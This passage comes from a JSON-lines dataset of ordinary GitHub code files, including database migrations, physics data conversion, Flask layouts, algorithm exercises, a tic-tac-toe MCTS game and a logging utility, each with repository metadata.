op.add_column('users', sa.Column('secure_password', sa.VARCHAR(length=255), autoincrement=False, nullable=True))\n op.drop_table('upvotes')\n op.drop_table('downvotes')\n op.drop_table('comments')\n op.drop_table('pitches')\n # ### end Alembic commands ###\n","repo_name":"OscarMugendi/Pitch-App","sub_path":"migrations/versions/687b57a0f5e9_initial_migration.py","file_name":"687b57a0f5e9_initial_migration.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11572344178","text":"import uproot4\nimport numpy as np\nimport pandas as pd\nimport concurrent.futures\n\n# TODO: not a method! 
(still specific script)\n\n\ndef convert_root_file_to_parquet(root_path, tree_name, branches, parq_path):\n\n ccup9_2015_file = r\"D:\\GoogleDrive\\Job\\cern\\Alice\\analysis\\data\\RhoPrime\\2015\\4Prongs2015o_withZDCTimes.root\"\n\n tree_name = \"4Prongs/events\"\n\n executor = concurrent.futures.ThreadPoolExecutor()\n\n branches = [\n \"T_Px\",\n \"T_Py\",\n \"T_Pz\",\n \"T_Q\",\n \"T_NumberOfSigmaTPCPion\",\n \"T_TPCRefit\",\n \"T_TPCNCls\",\n \"T_Phi\",\n \"T_Eta\",\n \"T_HasPointOnITSLayer0\",\n \"T_HasPointOnITSLayer1\",\n \"T_ITSModuleInner\",\n \"T_ITSModuleOuter\",\n ]\n\n evColumns = [\n \"RunNum\",\n \"PeriodNumber\",\n \"OrbitNumber\",\n \"BunchCrossNumber\",\n \"Mass\",\n \"Pt\",\n \"Q\",\n \"Rapidity\",\n \"Phi\",\n \"ZNAenergy\",\n \"ZNCenergy\",\n \"ZPAenergy\",\n \"ZPCenergy\",\n \"VtxX\",\n \"VtxY\",\n \"VtxZ\",\n \"VtxContrib\",\n \"VtxChi2\",\n \"VtxNDF\",\n \"SpdVtxX\",\n \"SpdVtxY\",\n \"SpdVtxZ\",\n \"SpdVtxContrib\",\n \"V0Adecision\",\n \"V0Cdecision\",\n \"ADAdecision\",\n \"ADCdecision\",\n \"V0Afired\",\n \"V0Cfired\",\n \"ADAfired\",\n \"ADCfired\",\n \"STPfired\",\n \"SMBfired\",\n \"SM2fired\",\n \"SH1fired\",\n \"OM2fired\",\n \"OMUfired\",\n \"IsTriggered\",\n \"nTracklets\",\n \"nTracks\",\n \"ZDCAtime_0\",\n \"ZDCAtime_1\",\n \"ZDCAtime_2\",\n \"ZDCAtime_3\",\n \"ZDCCtime_0\",\n \"ZDCCtime_1\",\n \"ZDCCtime_2\",\n \"ZDCCtime_3\",\n ]\n\n events = uproot4.open(\n ccup9_2015_file,\n object_cache=5000,\n num_workers=12,\n interpretation_executor=executor,\n )[tree_name]\n\n data_tracks = events.arrays(\n filter_name=branches, library=\"pd\", array_cache=5000\n ) # , entry_stop=1000000)\n data_tracks.to_parquet(\n r\"D:\\GoogleDrive\\Job\\cern\\Alice\\analysis\\data\\RhoPrime\\2015\\4Prongs2015oTracks.parquet\"\n )\n data_events = events.arrays(filter_name=evColumns, library=\"pd\")\n chips = events.arrays(filter_name=[\"FORChip\"], library=\"pd\")\n chips = chips.groupby(\"entry\").FORChip.apply(list)\n data_events[\"FORChip\"] = chips\n data_events.to_parquet(\n r\"D:\\GoogleDrive\\Job\\cern\\Alice\\analysis\\data\\RhoPrime\\2015\\4Prongs2015oEvents.parquet\"\n )\n\n\nif __name__ == \"__main__\":\n convert_root_file_to_parquet(\"\", \"\", \"\", \"\")\n","repo_name":"bdrum/cern-physics","sub_path":"notebooks/FourTracks/data/format/convert_to_parquet.py","file_name":"convert_to_parquet.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"30317775955","text":"from network.network import (get_number_of_activated_antenna,\n can_antenna_be_turned_on,\n turn_off_antenna,\n turn_on_antenna)\n\ndef _flip_coin(random):\n return random.random() < 0.5\n\ndef create_new_network(network, box_size, random):\n number_of_square = box_size * box_size\n for antenna in range(number_of_square):\n if can_antenna_be_turned_on(antenna, network, box_size) and _flip_coin(random):\n network = turn_on_antenna(antenna, network)\n else:\n network = turn_off_antenna(antenna, network)\n return network\n\n\ndef get_pseudo_random_networks(box_size, random):\n network = 0\n while True:\n network = create_new_network(network, box_size, random)\n yield network\n\ndef get_random_networks(box_size, random):\n time_between_sample = 20\n for i, network in enumerate(get_pseudo_random_networks(box_size, random), 1):\n if i % time_between_sample == 0:\n yield network\n\n\ndef estimate_number_of_activated_antenna(n, box_size, random):\n estimate = 0\n for _, network in zip(range(n), 
get_random_networks(box_size, random)):\n estimate += get_number_of_activated_antenna(network)\n return estimate / n\n","repo_name":"didiercrunch/simulationexam","sub_path":"network/gibbs.py","file_name":"gibbs.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34501788451","text":"from hashlib import md5\nfrom flask import render_template\n\nclass Layout:\n\n templates = [\n 'tab',\n 'column', # can settings column size\n 'modal',\n 'blank'\n ]\n\n template = 'blank'\n #\n # def __repr__(self):\n # return 'template: {}'.format(self.template)\n\n def __init__(self, template, layout, name = None):\n self.layouts = layout\n self.template = template\n self.asyncButtons = []\n self.modal = None\n self.modalLayouts = []\n self.templateSlug = None\n\n @classmethod\n def addLayout(cls, template, layout):\n if not isinstance(layout, list):\n layout = [layout]\n return cls(template, layout)\n\n def render(self, layouts, **kwargs):\n return render_template('layouts/{}.html'.format(self.template),\n forms = layouts,\n asyncButtons = self.asyncButtons,\n modal = self.modal,\n templateSlug = self.templateSlug,\n layout = self)\n\n def addAsyncButton(self, button):\n self.asyncButtons.append(button)\n return self\n\n def setModal(self, modal):\n self.modal = modal\n self.templateSlug = md5(modal.encode('utf-8')).hexdigest()\n return self\n\n def build(self, query, asyncLoad = False):\n if asyncLoad:\n self.template = 'blank'\n layouts = self.buildView(query, self.layouts)\n return self.render(layouts)\n\n def buildView(self, query, layouts):\n _layouts = []\n\n for layout in layouts:\n if isinstance(layout, Layout):\n if layout.template == 'modals':\n self.modalLayouts.append(layout)\n _layouts.append(layout.build(query))\n continue\n if callable(layout):\n layout = layout()\n layout.setRepository(query)\n _layouts.append(layout)\n\n return _layouts\n\n def getModals(self):\n return self.modalLayouts\n\n def filter(self, name):\n _layout = None\n for layout in self.layouts:\n if isinstance(layout, Layout):\n _layout = layout.filter(name)\n continue\n if layout.name == name:\n _layout = layout\n break\n return _layout\n\n\n def buildOrPrint(self, data):\n if isinstance(data, str):\n return data\n else:\n return data.build()\n","repo_name":"algha/tarim","sub_path":"tarim/app/modules/admin/core/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"18443669287","text":"\"\"\"\r\n Title: The end_value objective function\r\n Description: The objective function for calculating the x end point\r\n Author: Janzen Choi\r\n\r\n\"\"\"\r\n\r\n# Libraries\r\nfrom moga_neml.errors.__error__ import __Error__\r\n\r\n# The X End class\r\nclass Error(__Error__):\r\n \r\n def initialise(self, factor:float=10):\r\n \"\"\"\r\n Runs at the start, once\r\n\r\n Parameters:\r\n * `factor`: The factor to penalise for unconservative predictions\r\n \"\"\"\r\n x_list = self.get_x_data()\r\n self.factor = factor\r\n self.exp_x_end = x_list[-1]\r\n\r\n def get_value(self, prd_data:dict) -> float:\r\n \"\"\"\r\n Computing the NRMSE\r\n\r\n Parameters:\r\n * `prd_data`: The predicted data\r\n\r\n Returns the error\r\n \"\"\"\r\n x_label = self.get_x_label()\r\n prd_end_value = prd_data[x_label][-1]\r\n error = abs((prd_end_value - self.exp_x_end) / self.exp_x_end)\r\n if self.exp_x_end < 
prd_end_value:\r\n return error * self.factor\r\n return error","repo_name":"ACME-MG/calibrate","sub_path":"moga_neml/errors/end_cons.py","file_name":"end_cons.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29873145856","text":"\r\nfrom threading import RLock\r\n\r\nimport settings\r\nimport managers\r\n\r\nfrom logs import log\r\nfrom utils.properties import lazy, weak, constant, roproperty, rwproperty\r\nfrom utils import verificators\r\n\r\nfrom ..constants import NON_CONTAINER, CONTAINER, TOP_CONTAINER, RENDER_CONTEXT\r\nfrom ..generic import MemoryBase\r\nfrom ..empties import ChangeEmptyError, EmptySet\r\n\r\nfrom .attributes import MemoryAttributesSketch\r\nfrom .actions import MemoryActions\r\nfrom .events import MemoryEvents\r\nfrom .bindings import MemoryBindings\r\nfrom .structure import MemoryStructureSketch, MemoryStructure\r\n\r\n\r\n@weak(\"_collection\", \"_parent\", \"_application\")\r\nclass MemoryObjectSketch(MemoryBase):\r\n\r\n is_object = constant(True)\r\n\r\n is_non_container = property(lambda self: self._type.container == NON_CONTAINER)\r\n is_container = property(lambda self: CONTAINER <= self._type.container <= TOP_CONTAINER)\r\n is_top_container = property(lambda self: self._type.container == TOP_CONTAINER)\r\n\r\n _restore = False\r\n\r\n generic = RENDER_CONTEXT,\r\n\r\n @lazy\r\n def _primary(self):\r\n if self._virtual:\r\n result = self\r\n while result._parent and result._parent.virtual:\r\n result = result._parent\r\n return result\r\n else:\r\n return self._application\r\n\r\n @lazy\r\n def _bindings(self):\r\n return MemoryBindings(self)\r\n\r\n @lazy\r\n def _structure(self):\r\n return None if self._parent or self._virtual else MemoryStructureSketch(self)\r\n\r\n _order = None\r\n _id = None\r\n _name = None\r\n _original_name = None\r\n\r\n _dependents = EmptySet()\r\n\r\n def __init__(self, collection, type, application, parent, virtual=False, attributes=None):\r\n self._collection = collection\r\n self._virtual = virtual\r\n self._application = application\r\n self._parent = parent\r\n\r\n # initialize lock\r\n if parent:\r\n if virtual == parent.virtual:\r\n self._lock = parent.lock\r\n else:\r\n self._lock = RLock()\r\n else:\r\n self._lock = application.lock\r\n\r\n # generic characteristics\r\n self._type = type\r\n\r\n # collections\r\n self._attributes = MemoryAttributesSketch(self, values=attributes)\r\n self._objects = MemoryObjects(self)\r\n self._events = MemoryEvents(self)\r\n self._actions = MemoryActions(self)\r\n\r\n # internal\r\n self._classes = {}\r\n\r\n # lock = property(lambda self: self._application.lock)\r\n lock = roproperty(\"_lock\")\r\n order = rwproperty(\"_order\")\r\n is_virtual = virtual = roproperty(\"_virtual\")\r\n application = rwproperty(\"_application\")\r\n container = property(lambda self: self._parent.container if self._parent else self)\r\n parent = rwproperty(\"_parent\")\r\n primary = roproperty(\"_primary\")\r\n\r\n type = rwproperty(\"_type\")\r\n id = rwproperty(\"_id\")\r\n name = rwproperty(\"_name\")\r\n original_name = roproperty(\"_original_name\")\r\n\r\n attributes = roproperty(\"_attributes\")\r\n objects = roproperty(\"_objects\")\r\n events = roproperty(\"_events\")\r\n actions = roproperty(\"_actions\")\r\n bindings = roproperty(\"_bindings\")\r\n\r\n structure = roproperty(\"_structure\")\r\n\r\n stateful = property(lambda self: int(self._attributes.get(\"stateful\", 0)))\r\n hierarchy 
= property(lambda self: int(self._attributes.get(\"hierarchy\", 0)))\r\n\r\n def select(self, name, *names):\r\n if self._name == name:\r\n return self._objects.select(*names)\r\n else:\r\n return None\r\n\r\n def select_original(self, name, *names):\r\n if self._original_name or self._name == name:\r\n return self._objects.select(*names)\r\n else:\r\n return None\r\n\r\n def __invert__(self):\r\n ~self._attributes\r\n if self.__dict__.get(\"_structure\") is not None:\r\n ~self._structure\r\n\r\n restore = self._restore\r\n self.__class__ = MemoryObject\r\n self._collection.on_complete(self, restore)\r\n if not restore:\r\n managers.dispatcher.dispatch_handler(self, \"on_create\")\r\n if self._parent and self._virtual == self._parent.virtual:\r\n self._parent.invalidate(upward=True)\r\n self.autosave()\r\n return self\r\n\r\n def __str__(self):\r\n return \" \".join(filter(None, (\r\n \"virtual\" if getattr(self, \"_virtual\", None) else None,\r\n \"object\",\r\n \":\".join(filter(None, (getattr(self, \"_id\", None), getattr(self, \"_name\", None)))),\r\n \"sketch\")))\r\n\r\n\r\nclass MemoryObjectRestorationSketch(MemoryObjectSketch):\r\n\r\n _restore = True\r\n\r\n\r\nclass MemoryObjectDuplicationSketch(MemoryObjectSketch):\r\n\r\n def __init__(self, collection, application, parent, another):\r\n super(MemoryObjectDuplicationSketch, self).__init__(collection,\r\n another.type, application, parent,\r\n virtual=parent.virtual if parent else False,\r\n attributes=another.attributes)\r\n\r\n\r\nclass MemoryObjectGhost(MemoryBase):\r\n\r\n def __str__(self):\r\n return \" \".join(filter(None, (\r\n \"obsolete\",\r\n \"virtual\" if self._virtual else None,\r\n \"object\",\r\n \":\".join(filter(None, (self._id, self._name))))))\r\n\r\n\r\nclass MemoryObject(MemoryObjectSketch):\r\n\r\n @lazy\r\n def _structure(self):\r\n return None if self._parent or self._virtual else MemoryStructure(self)\r\n\r\n def __init__(self):\r\n raise Exception(u\"Use 'new' to create new object\")\r\n\r\n def _set_name(self, value):\r\n if self._name == value:\r\n return\r\n\r\n if not verificators.name(value):\r\n raise Exception(\"Invalid name: %r\" % value)\r\n\r\n with self.lock:\r\n self._collection.on_rename(self, value)\r\n managers.dispatcher.dispatch_handler(self, \"on_rename\", value)\r\n self._name = value\r\n self.invalidate(upward=True)\r\n self.autosave()\r\n\r\n type = roproperty(\"_type\")\r\n id = roproperty(\"_id\")\r\n name = rwproperty(\"_name\", _set_name)\r\n\r\n # unsafe\r\n def compose(self, ident=u\"\", file=None, shorter=False, excess=False):\r\n information = u\"ID=\\\"%s\\\" Name=\\\"%s\\\" Type=\\\"%s\\\"\" % (self._id, self._name.encode(\"xml\"), self._type.id)\r\n if self._attributes or self._objects or self._actions:\r\n file.write(u\"%s<Object %s>\\n\" % (ident, information))\r\n self._attributes.compose(ident=ident + u\"\\t\", file=file, shorter=shorter, excess=excess)\r\n self._objects.compose(ident=ident + u\"\\t\", file=file, shorter=shorter, excess=excess)\r\n self._actions.compose(ident=ident + u\"\\t\", file=file)\r\n file.write(u\"%s</Object>\\n\" % ident)\r\n else:\r\n file.write(u\"%s<Object %s/>\\n\" % (ident, information))\r\n\r\n def autosave(self):\r\n if not self._virtual:\r\n self._application.autosave()\r\n\r\n def invalidate(self, contexts=None, downward=False, upward=False):\r\n with self.lock:\r\n # cleanup compiled classes\r\n if \"_classes\" in self.__dict__:\r\n if contexts:\r\n if isinstance(contexts, basestring):\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s in %s context\" 
% (self, contexts))\r\n self._classes.pop(contexts, None)\r\n else:\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s in %s contexts\" % (self, \", \".join(contexts)))\r\n for context in contexts:\r\n self._classes.pop(context, None)\r\n else:\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s\" % self)\r\n self._classes = {}\r\n\r\n # NOTE: this can delete compiled e2vdom scripts\r\n # TODO: check necessity of resource invalidation\r\n # possible this must be done on object delete\r\n # NOTE: cleanup=False to avoid excessive file operations\r\n\r\n # cleanup resources\r\n managers.resource_manager.invalidate_resources(self._id, cleanup=False)\r\n\r\n # perform downward invalidation\r\n if downward:\r\n for child in self._objects.itervalues():\r\n child.invalidate(contexts=contexts, downward=True)\r\n\r\n # perform upward invalidation\r\n if upward:\r\n # NOTE: this can cause issues in case when\r\n # virtual objects will be stored between render\r\n # it may be worth adding a special attribute\r\n # that break invalidate chain for dynamic objects\r\n\r\n # validate only same (non-)virtual objects in chain\r\n if self._parent and self._virtual == self._parent.virtual:\r\n self._parent.invalidate(contexts=contexts, upward=True)\r\n for dependent in self._dependents:\r\n if settings.DETAILED_LOGGING:\r\n log.write(\"Invalidate %s dependent %s\" % (self, dependent))\r\n dependent.invalidate(contexts=contexts, upward=True)\r\n\r\n # update factory counter to indicate a change\r\n if self._factory_calls:\r\n self._factory_invalidates += 1\r\n\r\n def attach(self, object):\r\n with self.lock:\r\n try:\r\n self._dependents.add(object)\r\n except ChangeEmptyError:\r\n self._dependents = {object}\r\n\r\n def detach(self, object):\r\n with self.lock:\r\n self._dependents.remove(object)\r\n\r\n _factory_calls = 0\r\n _factory_invalidates = 0\r\n\r\n def factory(self, context, dynamic=None, mapping=None, probe=False):\r\n # we are busy\r\n managers.memory._operations += 1\r\n\r\n # check if already exists\r\n if dynamic is None:\r\n try:\r\n klass = self._classes[context]\r\n except KeyError:\r\n if probe:\r\n return None\r\n else:\r\n if dynamic <= klass._dynamic:\r\n return klass\r\n\r\n # remember invalidate count\r\n with self.lock:\r\n self._factory_calls += 1\r\n invalidates = self._factory_invalidates\r\n\r\n # start main loop\r\n while 1:\r\n try:\r\n new_klass = managers.compiler.compile(self, context, dynamic=dynamic, mapping=mapping)\r\n except BaseException:\r\n # just decrease calls counter on error\r\n with self.lock:\r\n self._factory_calls -= 1\r\n raise\r\n else:\r\n # on successfull compilation...\r\n with self.lock:\r\n if invalidates == self._factory_invalidates:\r\n # if has no changes\r\n if self._factory_calls > 1:\r\n # decrease calls counter\r\n self._factory_calls -= 1\r\n else:\r\n # or remove to free memory if no other calls\r\n del self._factory_calls\r\n self.__dict__.pop(\"_factory_invalidates\", None)\r\n\r\n # update klass if needed and return\r\n klass = self._classes.get(context)\r\n if klass is None or dynamic > klass._dynamic:\r\n self._classes[context] = klass = new_klass\r\n return klass\r\n else:\r\n # or just update stored value\r\n invalidates = self._factory_invalidates\r\n\r\n def __invert__(self):\r\n raise NotImplementedError\r\n\r\n def __str__(self):\r\n return \" \".join(filter(None, (\r\n \"virtual\" if self._virtual else None,\r\n \"object\",\r\n \":\".join(filter(None, (self._id, self._name))))))\r\n\r\n\r\nfrom .objects 
import MemoryObjects\r\n","repo_name":"VDOMBoxGroup/runtime2.0","sub_path":"sources/memory/application/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":12137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29907480891","text":"from util import node\nfrom MCTS import MCTS\n\nmcts = MCTS()\n\ndef ai_play(board,ai_player):\n\troot = node(board,None,ai_player)\n\t# print(root.board_state)\n\tedge = mcts.monte_carlo_tree_search(root,0.5)\n\t# print(root.board_state)\n\tmcts.make_move(edge.move, ai_player, root.board_state)\n\treturn root.board_state\n\ndef printBoard(board):\n\tfor i in range(1,10):\n\t\tif i%3 ==0:\n\t\t\tif board[i-1] == -1:\n\t\t\t\tprint(\" \")\n\t\t\telif board[i-1] == 1:\n\t\t\t\tprint(\"X\")\n\t\t\telif board[i-1] == 0:\n\t\t\t\tprint(\"O\")\n\t\telse:\n\t\t\tif board[i-1] == -1:\n\t\t\t\tprint(\" \",end=\"|\")\n\t\t\telif board[i-1] == 1:\n\t\t\t\tprint(\"X\",end=\"|\")\n\t\t\telif board[i-1] == 0:\n\t\t\t\tprint(\"O\",end=\"|\")\n\n\nletter_map = {'X' : 1, 'O' : 0}\ntictacBoard = [-1, -1, -1, -1, -1, -1, -1, -1, -1]\nai_player = 'X' \nuser = 'O'\n\nprintBoard(tictacBoard)\nwhile True:\n\tplayer_input = int(input(\"Input Position: \"))\n\ttictacBoard[player_input-1] = letter_map[user]\n\tprintBoard(tictacBoard)\n\twin = mcts.check_win(tictacBoard)\n\tif win == 2:\n\t\tprint(\"it's a draw\")\n\t\tbreak\n\telif win == 1:\n\t\tprint(\"X Won!!!\")\n\t\tbreak\n\telif win == 0:\n\t\tprint(\"O Won!!!\")\n\t\tbreak\n\t\n\ttictacBoard = ai_play(tictacBoard, letter_map[ai_player])\n\tprintBoard(tictacBoard)\n\twin = mcts.check_win(tictacBoard)\n\tif win == 2:\n\t\tprint(\"it's a draw\")\n\t\tbreak\n\telif win == 1:\n\t\tprint(\"X Won!!!\")\n\t\tbreak\n\telif win == 0:\n\t\tprint(\"O Won!!!\")\n\t\tbreak","repo_name":"Abdullah10111993/MCTS","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24896737192","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport sys\nimport logging\nimport logging.handlers\n\nfrom de.utils.common import AppInfo\nfrom logging import INFO, WARNING, ERROR, DEBUG\n\n\n# declared when adding log levels\n# DEBUG -> 10, DETAIL -> 18, MORE -> 19, INFO -> 20, WARNING -> 30\nMORE = 19\nDETAIL = 18\n\n# logger\nget_logger = logging.getLogger\napp_name = AppInfo().app_name() # extract the app_name of the currently running module\n\n# register the added log levels\nlogging.addLevelName(MORE, \"MORE\")\nlogging.addLevelName(DETAIL, \"DETAIL\")\n\n# add log output methods\nlogging.Logger.more = lambda inst, msg, *args, **kwargs: inst.log(MORE,\n f\"[{get_caller()}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.detail = lambda inst, msg, *args, **kwargs: inst.log(DETAIL,\n f\"[{get_caller(2)}>{get_caller()}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.logs = lambda inst, level, msg, *args, **kwargs: inst.log(level,\n f\"[{get_caller(1, False)}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.logc = lambda inst, level, msg, *args, **kwargs: inst.log(level,\n f\"[{get_caller()}] {msg}\",\n *args,\n **kwargs)\nlogging.Logger.logcc = lambda inst, level, msg, *args, **kwargs: inst.log(level,\n f\"[{get_caller(2)}>{get_caller()}] {msg}\",\n *args,\n **kwargs)\n\n\ndef get_caller(step=1, fullname=True):\n \"\"\"\n A function that returns the caller(function) of the code at the executed location.\n :param step:\n caller depth.\n :param fullname:\n True if you want to return the full_path_name\n containing the caller(function) path, False otherwise\n    
:return:\n \"\"\"\n step += 1\n caller = sys._getframe(step).f_locals.get('self')\n if isinstance(caller, type(None)):\n return sys._getframe(step).f_code.co_name\n elif fullname:\n return str(sys._getframe(step).f_locals.get('self')).split(\" \")[0][1:] + \".\" + \\\n sys._getframe(step).f_code.co_name\n else:\n return sys._getframe(step).f_code.co_name\n\n\ndef caller_id():\n \"\"\"\n return caller class id\n \"\"\"\n return id(sys._getframe(2).f_locals.get('self'))\n\n\ndef set_logging_level(logger_name=None, logging_level=None):\n \"\"\"\n set or change logging level\n \"\"\"\n if logging_level:\n if isinstance(logging_level, str):\n logging_level = logging_level.upper()\n c_logger = logging.getLogger(logger_name)\n c_logger.setLevel(logging_level)\n\n\n_stream_handler_enabled = [] # which loggers already have a stream handler\n_file_handlers = [] # which log files already have a file handler\n_default_format = '%(asctime)s %(levelname)s %(message)s'\n\n\ndef create_logger(log_file, logger_name=None, err_logfile=True, max_bytes=104857600,\n back_up_count=3, propagate=True, format=_default_format, stream_enabled=True):\n \"\"\"\n Create a logger.\n default (log file size 100MB, log format --> 'YYYY-MM-DD hh:mm:ss:ms loglevel message')\n :param log_file:\n :param logger_name: name of the logger to create\n :param err_logfile: whether to also log to an err log file\n :param max_bytes: default 100MB\n :param back_up_count: maximum number of backup files for the RotatingFileHandler\n :param propagate: whether to propagate records to parent loggers\n :param format: logging default format; see above\n :param stream_enabled:\n :return:\n \"\"\"\n global _stream_handler_enabled\n global _file_handlers\n\n clogger = logging.getLogger(logger_name)\n clogger.setLevel(INFO)\n clogger.propagate = propagate # whether to propagate to parent loggers\n formatter = logging.Formatter(format)\n\n # avoid registering duplicate handlers\n # ** stream_handler --> sends messages to the console\n if stream_enabled and logger_name not in _stream_handler_enabled:\n _stream_handler_enabled.append(logger_name)\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n clogger.addHandler(stream_handler)\n\n # create the log directory\n\n # os.path.dirname --> get only the directory part of the path\n log_dir = os.path.dirname(log_file)\n if log_dir and not os.path.exists(log_dir):\n os.makedirs(log_dir, exist_ok=True) # exist_ok --> ignore if the directory already exists\n\n # ** file_handler --> sends messages to a file\n # RotatingFileHandler -> creates and manages up to the configured number of backup files\n # creates the .log / .err files.\n # - .log --> its logger level follows the level the user configured in app_properties.yml\n if log_file not in _file_handlers:\n _file_handlers.append(log_file)\n file_handler = logging.handlers.RotatingFileHandler(log_file,\n maxBytes=max_bytes,\n backupCount=back_up_count)\n file_handler.setFormatter(formatter)\n clogger.addHandler(file_handler)\n\n # .err -> a separate .err file that stores only the records logged at ERROR level\n if err_logfile:\n err_file_handler = logging.handlers.RotatingFileHandler(log_file.replace(\".log\", \".err\"),\n maxBytes=max_bytes,\n backupCount=back_up_count)\n err_file_handler.setFormatter(formatter)\n err_file_handler.setLevel(ERROR)\n clogger.addHandler(err_file_handler)\n\n return clogger\n","repo_name":"instork/airflow-api2db-exercise","sub_path":"dags/de/utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"14917525895","text":"#!/usr/bin/python\n\nimport os, sys, mmap\nfrom regression import Regression\n\nloader = '../src/pal'\n\nregression = Regression(loader, \"Thread\")\n\nregression.add_check(name=\"Thread 
Creation\",\n check=lambda res: \"Child Thread Created\" in res[0].log and\n \"Run in Child Thread: Hello World\" in res[0].log)\n\nregression.add_check(name=\"Multiple Threads Run in Parallel\",\n check=lambda res: \"Threads Run in Parallel OK\" in res[0].log)\n\nregression.add_check(name=\"Set Thread Private Segment Register\",\n check=lambda res: \"Private Message (FS Segment) 1: Hello World 1\" in res[0].log and\n \"Private Message (FS Segment) 2: Hello World 2\" in res[0].log)\n\nregression.add_check(name=\"Thread Exit\",\n check=lambda res: \"Child Thread Exited\" in res[0].log)\n\nregression.run_checks()\n","repo_name":"jovanbulck/sgx-pte","sub_path":"Pal/regression/02_Thread.py","file_name":"02_Thread.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"68"} +{"seq_id":"31515901951","text":"# Given an array of numbers, find the maximum sum of any contiguous subarray of the array\n\n# Example Input [34, -50, 42, 14, -5, 86]\n# Output 137\n# 42 + 14 - 5 + 86 = 137\n\n# brute force and no wrapping around is allowed\n# O(N^3) time complexity due to the double-lay for loops, the sum function takes another O(N) time\n# O(1) time complexity\ndef max_subarray_sum_1(nums):\n max_sum = 0\n for i in range(len(nums)):\n for j in range(i,len(nums)):\n #print(nums[i:j+1], sum(nums[i:j+1]))\n max_sum = sum(nums[i:j+1]) if max_sum < sum(nums[i:j+1]) else max_sum\n\n return max_sum\n\n# O(N) time, just iterate through the array onece\n# like a dp approach\n# two variables, max_so_far stores the global max, max_ending_here stores the contiguous sum till the current element\n# Kadane’s algorithm\ndef max_subarray_sum_2(nums):\n max_so_far = 0\n max_ending_here = 0\n \n for i in range(len(nums)):\n max_ending_here = max_ending_here + nums[i]\n max_ending_here = 0 if max_ending_here < 0 else max_ending_here\n\n max_so_far = max_ending_here if max_ending_here > max_so_far else max_so_far\n \n return max_so_far\n\n# When wrapping is allowed\n\n# Example Input [8, -1, 3, 4]\n# Output 15\n# 3 + 4 + 8 = 15\n\n# wrapping of contributing elements impleies non wrapping of non contributing elements.\n# to maximize sum of wrapping circular array, we need to find the non-wrapping/contiguous subarray with the mininmum sum (or most negative)\n# 3-pass, first pass computes maximum subarray sum, second pass reverse the sign of the input array, third pass computes smallest subarray sum by calling the same function with the reversed sign input array\n# as after reversing the sign, finding the max subarray is equivalent as finding the min continous subarray\n# then reverse back the sign of max subarray of the reversed input array and add to total sum of input array, this gives the largest sum of wrapping circular array\n# compare non-wrapping max and wrapping max\n\ndef max_subarray_sum_3(nums):\n\n def max_subarray_sum_2(nums):\n max_so_far = 0\n max_ending_here = 0\n \n for i in range(len(nums)):\n max_ending_here = max_ending_here + nums[i]\n max_ending_here = 0 if max_ending_here < 0 else max_ending_here\n\n max_so_far = max_ending_here if max_ending_here > max_so_far else max_so_far\n \n return max_so_far\n\n reverse_nums = [-x for x in nums]\n\n print(max_subarray_sum_2(nums), max_subarray_sum_2(reverse_nums), sum(nums))\n return max(max_subarray_sum_2(nums), sum(nums) + max_subarray_sum_2(reverse_nums))\n\n\n# solution from the book, max_subarray_sum and min_subarray_sum are essentially the same algo\n# can be implemented as 
above\ndef maximum_circular_subarray(nums):\n max_subarray_sum_wraparound = sum(nums) - min_subarray_sum(nums)\n\n return max(max_subarray_sum(nums), max_subarray_sum_wraparound)\n\ndef max_subarray_sum(nums):\n max_ending_here, max_so_far = 0, 0\n\n for x in nums:\n max_ending_here = max(x, max_ending_here + x)\n max_so_far = max(max_so_far, max_ending_here)\n\n return max_so_far\n\ndef min_subarray_sum(nums):\n min_ending_here, min_so_far = 0, 0 \n\n for x in nums:\n min_ending_here = min(x, min_ending_here+x)\n min_so_far = min(min_so_far, min_ending_here)\n\n return min_so_far\n","repo_name":"mxu007/daily_coding_problem_practice","sub_path":"DCP_1_3.py","file_name":"DCP_1_3.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2735150668","text":"import numpy as np\nimport os\nfrom scipy.ndimage import zoom\n\nroot = r\"Data\\Out\"\n\nfor item in os.listdir(root):\n\n if item not in os.listdir(r'Data/Out_NN'):\n print(item)\n array = np.load(os.path.join(root, item))\n reshaped = zoom(array, (1, 0.5, 0.5))\n np.save(os.path.join(r\"Data\\Out_NN\", item), reshaped)\n ","repo_name":"siddharthbharthulwar/Synthetic-X-Ray","sub_path":"resizect.py","file_name":"resizect.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"74795242777","text":"#!/usr/bin/env python3\n#Title: Calculator\n#Author: MYTH\n\nimport tkinter as tk\nimport time\nfrom tkinter import * \n\ndef delete():\n mistake = input.get()[:-1]\n 